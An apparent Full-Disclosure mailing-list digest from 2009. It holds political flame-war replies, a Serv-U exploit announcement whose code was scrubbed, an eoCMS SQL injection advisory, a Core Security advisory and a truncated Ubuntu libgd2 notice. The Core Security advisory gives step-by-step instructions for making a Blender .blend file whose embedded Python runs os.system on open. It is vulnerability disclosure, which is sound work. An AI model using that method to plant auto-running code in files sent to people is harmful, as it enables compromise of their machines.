Date: Wed, 04 Nov 2009 21:17:52 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <6583.1257389321@turing-police.cc.vt.edu>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>
	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
	<16583.1257310348@turing-police.cc.vt.edu>
	<351C1CDE56CA1FA6D2AC3502@utd65257.utdallas.edu>
	<20035.1257362462@turing-police.cc.vt.edu>
	<EDEC5775C3E2ADED0668CA9C@utd65257.utdallas.edu>
	<29243.1257374172@turing-police.cc.vt.edu>           
	<4CA79DCF9285D97618CFF20F@utd65257.utdallas.edu>
	<6583.1257389321@turing-police.cc.vt.edu>
Message-ID: <46F24CE0B8CD4D65FFF4B32B@Macintosh-2.local>

--On November 4, 2009 8:48:41 PM -0600 Valdis.Kletnieks at vt.edu wrote:

> On Wed, 04 Nov 2009 17:42:37 CST, Paul Schmehl said:
>> You and millions of others love to conflate those issues with
>> warrantless surveillance of US citizens for the purpose of obtaining
>> evidence in a criminal investigation and then scream bloody murder
>> about warrantless surveillance and intrusions of our rights.
>
> OK, so in your opinion we should sit back and accept the legal theory
> that "I'm the President, and as Commander in Chief I can give orders
> contrary to the usual 4th Amendment restrictions" (note carefully that
> there was *NOT* an actual formal declaration of war made - Congress
> merely authorized the use of force. Many constitutional law experts seem
> to think this makes a difference).

The President doesn't need a declaration of war to conduct surveillance on 
the enemies of the US, and foreign agents do not have any 4th amendment 
rights.  Only US citizens do.  Your argument is akin to the stupidity that 
insists that terrorists held in Guantanmo Bay have a Constitutional right 
to counsel, a day in court, etc., etc., ad nauseum, ad infinitum.  The 
rest of the world laughs at such idiocy (not to mention never practices 
it.)

>
> So it is OK if as President, he decides to suspend habeus corpus?
>

Foreign agents don't have Constitutional rights.  (Maybe if I repeat this 
enough it will sink in.)

> If it's *not* OK, how do you intend to complain once your corpus can't
> be habeased any more?
>
> "The price of freedom is eternal vigilance" -- Thomas Jefferson.
>

Eternal vigilance includes voting, taking the time to understand the 
issues and your rights, and having enough good sense to realize that US 
Constitutional rights do not apply to non-citizens.  Unless you can 
produce a single example of a US citizen who was charged with, indicted 
and convicted of a crime based upon so-called illegal surveillance, your 
argument is nothing more than hyperventilation over boogy men.  Have the 
black helicopters come yet?

> In other words, the time to raise a fuss is *before* they go down the
> slippery slope, not once they're 3/4 of the way down and in an
> uncontrolled slide.
>
> "When fascism comes to America, it will be wrapped in a flag and
> carrying a cross." -- Sinclair Lewis, 1935
>

Well Marxism has come to America and millions are marching willingly into 
slavery.  The very idea that the government can force you to buy insurance 
is so anathema to the Constitution that it's stunning anyone would 
consider it, much less listen to Congresspersons stutter and stammer when 
asked where in the Constitution the government is given the right to force 
US citizens to buy anything.

Sinclair Lewis would approve, of course, because he too was a Marxist. 
Marxists *want* people to be enslaved to the government.

> And that's why we raise a fuss.  You may wish to read Naomi Wolf's
> "Fascist America in 10 easy steps":
>
> http://www.guardian.co.uk/world/2007/apr/24/usa.comment
>
> And that's why we raise a fuss.

Mostly "we" raise a fuss because "we" are profoundly ignorant.

Paul Schmehl, If it isn't already
obvious, my opinions are my own
and not those of my employer.
******************************************
WARNING: Check the headers before replying


From pschmehl_lists at tx.rr.com  Thu Nov  5 03:19:29 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Wed, 04 Nov 2009 21:19:29 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <alpine.LNX.1.10.0911041801170.14157@catbert.rellim.com>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>
	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
	<16583.1257310348@turing-police.cc.vt.edu>
	<351C1CDE56CA1FA6D2AC3502@utd65257.utdallas.edu>
	<20035.1257362462@turing-police.cc.vt.edu>
	<EDEC5775C3E2ADED0668CA9C@utd65257.utdallas.edu>
	<alpine.LNX.1.10.0911041801170.14157@catbert.rellim.com>
Message-ID: <D2B38A8FDAA7DC4EEEE31433@Macintosh-2.local>

--On November 4, 2009 8:03:10 PM -0600 "Gary E. Miller" <gem at rellim.com> 
wrote:

>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Yo Paul!
>
> On Wed, 4 Nov 2009, Paul Schmehl wrote:
>
>> Please cite one proven instance where surveillance was done on anyone
>> without a FISA warrant - and lefty blogs filled with hyperbole don't
>> count.
>
> Jewel v. NSA
>

Yo Gary.  Look up alleged in a dictionary.  You won't find the word proven 
there.

I could sue the government for hiding space men at Area 51.  Until I can 
produce the evidence, it's vapor.

Paul Schmehl, If it isn't already
obvious, my opinions are my own
and not those of my employer.
******************************************
WARNING: Check the headers before replying


From megumi1990 at gmail.com  Thu Nov  5 03:41:12 2009
From: megumi1990 at gmail.com (Megumi Yanagishita)
Date: Thu, 5 Nov 2009 11:41:12 +0800
Subject: [Full-disclosure] Exp1oit for Serv-U 9.0.0.5 new bug
Message-ID: <4fd563920911041941u339f3766tcdbc141c02621c31@mail.gmail.com>

hi,
  I have written a piece of code to demonstrate the new serv-u bug.
  Attached please find the source code for Win2k3 SP2 + DEP. Perhaps you
should replace your own shellcode here.

-- 
Thanks,
M. Yanagishita
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091105/6bafce41/attachment.html 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: EB FE.cpp
Type: application/octet-stream
Size: 2025 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091105/6bafce41/attachment.obj 

From svrt at bkav.com.vn  Thu Nov  5 05:22:29 2009
From: svrt at bkav.com.vn (Bkis)
Date: Thu, 05 Nov 2009 12:22:29 +0700
Subject: [Full-disclosure] [Bkis-12-2009] eoCMS SQL injection vulnerability
	- Bkis Report
Message-ID: <4AF26115.4030001@bkav.com.vn>

eoCMS SQL injection vulnerability

1. General information

eoCMS is an open source code software which is used to develop Internet 
forum (http://eocms.com/). On October 15, 2009, Bkis Security detected a 
SQL injection vulnerability in some functions of eoCMS.

This is a critical vulnerability which allows hacker to access the data 
in the database and execute unauthorized tasks. Bkis has informed the 
software developer team, and they have patched the vulnerability in the 
latest software version - eoCMS 0.9.02.

Details : http://blog.bkis.com/?p=800
SVRT Advisory: Bkis-12-2009
Initial vendor notification : 11/25/09
Release Date: 11/05/09
Update Date: 11/05/09
Discovered by: Bkis
Attack Type: SQL Injection
Security Rating: Critical
Affected Software: eCMS (version <= 0.9.01)

2. Technical Description

SQL Injection occurs due to the software on Server can not strictly 
control the validity of variables transmitted from client before sending 
a query to the database. Hacker is able to take advantage of this 
vulnerability to insert malicious SQL code and then can manipulate all 
the data in the database.

SQL Injection vulnerability is found in the page divide function of 
viewboard and viewtopic module. Though eoCMS is integrated with error 
control technology (including SQL Injection), this technology fails to 
thoroughly handle the errors. Thus, hacker is able to take advantage of 
the found vulnerability to gain any information from the database, 
including administrator's data.

3. Solution

Rating this as a critical vulnerability, Bkis recommends all 
organizations and individuals using eoCMS immediately update the latest 
software version.

---------------------------------------------
Bkis Internet Security (www.bkis.vn)


From tripmonster at gmail.com  Thu Nov  5 15:10:19 2009
From: tripmonster at gmail.com (sunjester)
Date: Thu, 5 Nov 2009 07:10:19 -0800
Subject: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
Message-ID: <931527c60911050710m70f8e81ftf0e053b5279511ff@mail.gmail.com>

>
> Its evil. Making people believe that someone is dead, publicly, and placing
> obituaries online shows no regard for the thoughts & feelings of the person
> being trolled or the others who may read them.
>

Who cares? I think it would be awesome for people to circulate my death.

-- 
P1 sunjester
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091105/6edbe8a2/attachment.html 

From advisories at coresecurity.com  Thu Nov  5 17:12:52 2009
From: advisories at coresecurity.com (CORE Security Technologies Advisories)
Date: Thu, 05 Nov 2009 14:12:52 -0300
Subject: [Full-disclosure] CORE-2009-0912: Blender .blend Project Arbitrary
	Command Execution
Message-ID: <4AF30794.5060406@coresecurity.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
      Core Security Technologies - CoreLabs Advisory
           http://www.coresecurity.com/corelabs/

Blender .blend Project Arbitrary Command Execution



1. *Advisory Information*

Title: Blender .blend Project Arbitrary Command Execution
Advisory Id: CORE-2009-0912
Advisory URL:
http://www.coresecurity.com/content/blender-scripting-injection
Date published: 2009-11-05
Date of last update: 2009-11-04
Vendors contacted: Blender Foundation
Release mode: User release



2. *Vulnerability Information*

Class: Failure to Sanitize Data into a Different Plane [CWE-74]
Impact: Code execution
Remotely Exploitable: Yes (client side)
Locally Exploitable: No
Bugtraq ID: 36838
CVE Name: CVE-2009-3850



3. *Vulnerability Description*

Blender [2] is a 3D graphics application released as free software. It
can be used for modeling, texturing, rendering, particle, and other
simulations and creating interactive 3D applications, including games.

Blender embeds a python interpreter to extend its functionality.
Blender .blend project files can be modified to execute arbitrary
commands without user intervention by design. An attacker can take
full control of the machine where Blender is installed by sending a
specially crafted .blend file and enticing the user to open it.


4. *Vulnerable packages*

   . Blender 2.49b
   . Blender 2.40
   . Blender 2.35a
   . Blender 2.34
   . Older versions are probably affected too, but they were not checked.


5. *Vendor Information, Solutions and Workarounds*

The vendor did not provide fixes or workaround information.

To determine if a .blend file is suspicious you could parse the
content of the file [3] searching for a SDNA [4] of type ScriptLink
[5] with python code bound to an "onLoad" action.


6. *Credits*

This vulnerability was discovered and researched by Diego Juarez and
Sebastian Tello from Core Security Technologies during Bugweek 2009 [1].

The publication of this advisory was coordinated by Fernando Russ from
Core Security Advisories Team.


7. *Technical Description / Proof of Concept Code*

Blender [2] .blend project files can be modified to execute arbitrary
commands without user intervention by design. An attacker can take
full control of the machine where Blender is installed sending a
specially crafted .blend file and enticing the user to open it.

These are the steps to reproduce the issue:

   . Open the "Text Editor" Panel.
   . Right click on the canvas and select "New".
   . Write your python code there. For instance:

/-----
      import os
      os.system("calc.exe")
- -----/

   . In the text name field (TX:Text.001) input a name for your
script, e.g.: TX:myscript.
   . Open the "Buttons Window" panel.
   . From the "panel" dropdown choose "Script".
   . Check that "enable script links" is active.
   . Click on "new".
   . Select the script you created (e.g. myscript).
   . Choose "OnLoad" from the event dropdown list.
   . In the "User Preferences" panel, select File->Save, and save your
project.


8. *Report Timeline*

. 2009-10-19:
Core Security Technologies notifies to the Blender foundation of the
vulnerabilty and announces its initial plan to publish this advisory
on October 30th, 2009.

. 2009-10-20:
The Blender foundation answers that "We are a free software project,
all issues are openly discussed. Just post the discoveries you made
for everyone to look at."

. 2009-10-27:
Core sends a draft advisory to the Blender Foundation for this flaw.
Core also reminds the vendor its intention to publish the content on
October 30th, 2009.

. 2009-10-27:
BID 36838 was assigned to this issue

. 2009-11-03:
CVE 2009-3850 was assigned to this issue

. 2009-11-03:
The Blender Foundation didn't acknowledge or answer our comunications
anymore.

. 2009-11-05:
The advisory CORE-2009-0912 is published.



9. *References*

[1] The author participated in Core Bugweek 2009 as member of the team
"Gimbal Lock N Load".
[2] http://www.blender.org/
[3] http://www.atmind.nl/blender/mystery_ot_blend.html
[4] http://www.atmind.nl/blender/blender-sdna.html
[5] http://www.atmind.nl/blender/blender-sdna.html#struct:ScriptLink


10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is
charged with anticipating the future needs and requirements for
information security technologies. We conduct our research in several
important areas of computer security including system vulnerabilities,
cyber attack planning and simulation, source code auditing, and
cryptography. Our results include problem formalization,
identification of vulnerabilities, novel solutions and prototypes for
new technologies. CoreLabs regularly publishes security advisories,
technical papers, project information and shared software tools for
public use at: http://www.coresecurity.com/corelabs.


11. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources
are exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and
software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980
or on the Web at http://www.coresecurity.com.


12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
 
iEYEARECAAYFAkrzB5QACgkQyNibggitWa3zbwCfYhTo5o2x1lggJ2dZjAx1uQyp
YEkAoKjU9/gtdrUV7zHGFo6H9GJUyW7W
=FxMs
-----END PGP SIGNATURE-----


From marc.deslauriers at canonical.com  Thu Nov  5 19:30:10 2009
From: marc.deslauriers at canonical.com (Marc Deslauriers)
Date: Thu, 05 Nov 2009 14:30:10 -0500
Subject: [Full-disclosure] [USN-854-1] GD library vulnerabilities
Message-ID: <1257449410.27175.0.camel@mdlinux.technorage.com>

===========================================================
Ubuntu Security Notice USN-854-1          November 05, 2009
libgd2 vulnerabilities
CVE-2007-3475, CVE-2007-3476, CVE-2007-3477, CVE-2009-3293,
CVE-2009-3546
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04
Ubuntu 9.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libgd2-noxpm                    2.0.33-2ubuntu5.4
  libgd2-xpm                      2.0.33-2ubuntu5.4

Ubuntu 8.04 LTS:
  libgd2-noxpm                    2.0.35.dfsg-3ubuntu2.1
  libgd2-xpm                      2.0.35.dfsg-3ubuntu2.1

Ubuntu 8.10:
  libgd2-noxpm                    2.0.36~rc1~dfsg-3ubuntu1.8.10.1
  libgd2-xpm                      2.0.36~rc1~dfsg-3ubuntu1.8.10.1

Ubuntu 9.04:
  libgd2-noxpm                    2.0.36~rc1~dfsg-3ubuntu1.9.04.1
  libgd2-xpm                      2.0.36~rc1~dfsg-3ubuntu1.9.04.1

Ubuntu 9.10:
  libgd2-noxpm                    2.0.36~rc1~dfsg-3ubuntu1.9.10.1
  libgd2-xpm                      2.0.36~rc1~dfsg-3ubuntu1.9.10.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Tomas Hoger discovered that the GD library did not properly handle the
number of colors in certain malformed GD images. If a user or automated
system were tricked into processing a specially crafted GD image, an
attacker could cause a denial of service or possibly execute arbitrary
code. (CVE-2009-3546)

It was discovered that the GD library did not properly handle incorrect
color indexes. An attacker could send specially crafted input to
applications linked against libgd2 and cause a denial of service or
possibly execute arbitrary code. This issue only affected Ubuntu 6.06 LTS.
(CVE-2009-3293)

It was discovered that the GD library did not properly handle certain
malformed GIF images. If a user or automated system were tricked into
processing a specially crafted GIF image, an attacker could cause a denial
of service. This issue only affected Ubuntu 6.06 LTS. (CVE-2007-3475,
CVE-2007-3476)

It was discovered that the GD library did not properly handle large angle
degree values. An attacker could send specially crafted input to
applications linked against libgd2 and cause a denial of service. This
issue only affected Ubuntu 6.06 LTS. (CVE-2007-3477)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.33-2ubuntu5.4.diff.gz
      Size/MD5:   258547 04046c5a93a087f4f5ade0055bbf22cb
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.33-2ubuntu5.4.dsc
      Size/MD5:      973 c7ce6a684cc67dbc69f03e03b54b51b2
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.33.orig.tar.gz
      Size/MD5:   587617 be0a6d326cd8567e736fbc75df0a5c45

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-dev_2.0.33-2ubuntu5.4_all.deb
      Size/MD5:   129774 a31ad9eacfd696ffe3fdef93acef73c3
    http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd2_2.0.33-2ubuntu5.4_all.deb
      Size/MD5:   129750 4d8c0ad2d083e789d953e6182d078ef4

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-2ubuntu5.4_amd64.deb
      Size/MD5:   341658 4561d10b25acda7165cd538d88a9e5a9
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.33-2ubuntu5.4_amd64.deb
      Size/MD5:   200492 e6457ffbe31f4e546d4484d5bd1bc2ed
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.33-2ubuntu5.4_amd64.deb
      Size/MD5:   343380 0d023589f24ca1a95040993d1d4a30c1
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.33-2ubuntu5.4_amd64.deb
      Size/MD5:   202212 7cec8f0bc8704d35e453eb2b07a21e01
    http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.33-2ubuntu5.4_amd64.deb
      Size/MD5:   143136 f438666205ada39092897b6e959345d8

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-2ubuntu5.4_i386.deb
      Size/MD5:   331210 a0480de5209f2e66de2164997c3bcb25
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.33-2ubuntu5.4_i386.deb
      Size/MD5:   193572 b195270648b35995a62b1887995e4025
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.33-2ubuntu5.4_i386.deb
      Size/MD5:   331984 a1a1c0b922638f2adcbd86188f689df1
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.33-2ubuntu5.4_i386.deb
      Size/MD5:   195218 100b604eb7ada1ac48c38fddaeeee7d5
    http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.33-2ubuntu5.4_i386.deb
      Size/MD5:   142190 8cb1e1126490d20129355cea61535cea

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-2ubuntu5.4_powerpc.deb
      Size/MD5:   342796 c1bf1b5a00916f51d60266cac243d152
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.33-2ubuntu5.4_powerpc.deb
      Size/MD5:   200630 20f64b15460b57ed8f76758eea5b22a7
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.33-2ubuntu5.4_powerpc.deb
      Size/MD5:   344696 b5eb207979cea4e3f29101177591599c
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.33-2ubuntu5.4_powerpc.deb
      Size/MD5:   202184 ddf0bf913ff41c27fbf635dfe26fe34e
    http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.33-2ubuntu5.4_powerpc.deb
      Size/MD5:   151384 574ab21f61657b6c713c917d98636c83

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-2ubuntu5.4_sparc.deb
      Size/MD5:   334374 672949b6e6eed63db0372617b9c62b69
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.33-2ubuntu5.4_sparc.deb
      Size/MD5:   194718 bc9eaf1f8bde7c9de9eb946c55c54883
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.33-2ubuntu5.4_sparc.deb
      Size/MD5:   335598 b27bef38e70d8b2895346b4b8d89a6c9
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.33-2ubuntu5.4_sparc.deb
      Size/MD5:   196614 92e83e3d10c5c9803df672fd86ba8f1e
    http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.33-2ubuntu5.4_sparc.deb
      Size/MD5:   142438 5a968a81069fe918ad28bfa21c4b1c1b

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.35.dfsg-3ubuntu2.1.diff.gz
      Size/MD5:    27319 45adf128acd808dabf385651895aa09e
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.35.dfsg-3ubuntu2.1.dsc
      Size/MD5:     1164 84af33aef5005c99f753b91d9a7320ab
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.35.dfsg.orig.tar.gz
      Size/MD5:  1338565 49d550f8e74802c1d890b97174366211

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.35.dfsg-3ubuntu2.1_amd64.deb
      Size/MD5:   219144 d36dea3db101fe2d441f2fe620571984
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.35.dfsg-3ubuntu2.1_amd64.deb
      Size/MD5:   323234 557dd7a585796404e5875dd3c33cb017
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.35.dfsg-3ubuntu2.1_amd64.deb
      Size/MD5:   221410 2f02000bf6d14063fb7a7f4c9dad50ef
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.35.dfsg-3ubuntu2.1_amd64.deb
      Size/MD5:   325608 e1ae6eeb633ccdde8761eba0a67770b2
    http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.35.dfsg-3ubuntu2.1_amd64.deb
      Size/MD5:    19388 49c6db93a2b1f52e809a83e21db6b527

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.35.dfsg-3ubuntu2.1_i386.deb
      Size/MD5:   210258 a4ca408ab1ec958177f4ba7a5bcd5e7d
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.35.dfsg-3ubuntu2.1_i386.deb
      Size/MD5:   319256 6a3e993b8c7f12e58228c4291d2c3149
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.35.dfsg-3ubuntu2.1_i386.deb
      Size/MD5:   212532 78fa81129cc415e920a3ee0ef776e415
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.35.dfsg-3ubuntu2.1_i386.deb
      Size/MD5:   320800 4e67408e5d55cf425bbf0d21cad78dd5
    http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.35.dfsg-3ubuntu2.1_i386.deb
      Size/MD5:    18516 4457cd2e18381a7b7269009da1fb5529

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.35.dfsg-3ubuntu2.1_lpia.deb
      Size/MD5:   210804 b021b96240efc9e6cfd1335b140bc13e
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm_2.0.35.dfsg-3ubuntu2.1_lpia.deb
      Size/MD5:   319102 5a67bdbb47ef8b56e2601e8cba84a459
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.35.dfsg-3ubuntu2.1_lpia.deb
      Size/MD5:   213014 55fc97845073af3dbdd52be2c56f67d6
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm_2.0.35.dfsg-3ubuntu2.1_lpia.deb
      Size/MD5:   320882 3633a3aef5f3be13d476fba61048f0bb
    http://ports.ubuntu.com/pool/universe/libg/libgd2/libgd-tools_2.0.35.dfsg-3ubuntu2.1_lpia.deb
      Size/MD5:    18486 e850d523d32fd5f2e1071e051ae038df

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.35.dfsg-3ubuntu2.1_powerpc.deb
      Size/MD5:   219994 79a26d5fb9b61711e50b500026a41124
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm_2.0.35.dfsg-3ubuntu2.1_powerpc.deb
      Size/MD5:   326274 e57da4b175aa027c30ec7e54c2052c0c
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.35.dfsg-3ubuntu2.1_powerpc.deb
      Size/MD5:   222422 25e575dbc93ab0cc2752962c94997a29
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm_2.0.35.dfsg-3ubuntu2.1_powerpc.deb
      Size/MD5:   328528 988ca39c65157c572d2f694ade3190e7
    http://ports.ubuntu.com/pool/universe/libg/libgd2/libgd-tools_2.0.35.dfsg-3ubuntu2.1_powerpc.deb
      Size/MD5:    29048 539a28718a024af12d04928aa7778bd9

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.35.dfsg-3ubuntu2.1_sparc.deb
      Size/MD5:   211608 77263c03ab268f0425bc70f0284f5c72
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-noxpm_2.0.35.dfsg-3ubuntu2.1_sparc.deb
      Size/MD5:   318440 89589e71997820728ba1cf8627078cf9
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.35.dfsg-3ubuntu2.1_sparc.deb
      Size/MD5:   214044 96628507c274fdf974e744be7afecc60
    http://ports.ubuntu.com/pool/main/libg/libgd2/libgd2-xpm_2.0.35.dfsg-3ubuntu2.1_sparc.deb
      Size/MD5:   320356 dc1b6b6b52469fda8fac7b60fa2214f5
    http://ports.ubuntu.com/pool/universe/libg/libgd2/libgd-tools_2.0.35.dfsg-3ubuntu2.1_sparc.deb
      Size/MD5:    18960 a1d103ca723f4d9402a50a5405536b0b

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.36~rc1~dfsg-3ubuntu1.8.10.1.diff.gz
      Size/MD5:    30244 9d64fc5360ba87d898032613292e961d
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.36~rc1~dfsg-3ubuntu1.8.10.1.dsc
      Size/MD5:     1695 1d2b7ad373e102d068a1711453d9f814
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.36~rc1~dfsg.orig.tar.gz
      Size/MD5:   761899 0f4d2fa45627af0e87fcb74f653b66dd

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_amd64.deb
      Size/MD5:   219946 7af0ca1ab929bd62db64214e526925f8
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_amd64.deb
      Size/MD5:   212962 6c4c588af279289240159afc716570b0
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_amd64.deb
      Size/MD5:   222240 9bbf4da1e70cab88ce6e965f4d0be05f
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_amd64.deb
      Size/MD5:   215382 cc9a6b114f7de96e61141e3029ec638d
    http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_amd64.deb
      Size/MD5:    19456 502552b6eda11dd0c080b01b37c34357

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_i386.deb
      Size/MD5:   211642 3ba494ce963f86b5f606dff7beaa690c
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_i386.deb
      Size/MD5:   208744 d880c620a27496bba02de3fe6fa6a8ca
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_i386.deb
      Size/MD5:   213802 ecb7303b0b23d3b3623c65f520bbb4ba
    http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_i386.deb
      Size/MD5:   210894 040af3732b9215d0b66f2f7d875a2bc6
    http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.36~rc1~dfsg-3ubuntu1.8.10.1_i386.deb
      Size/MD5:    17872 4c9f087a570c86bcc1b7653d782e3964

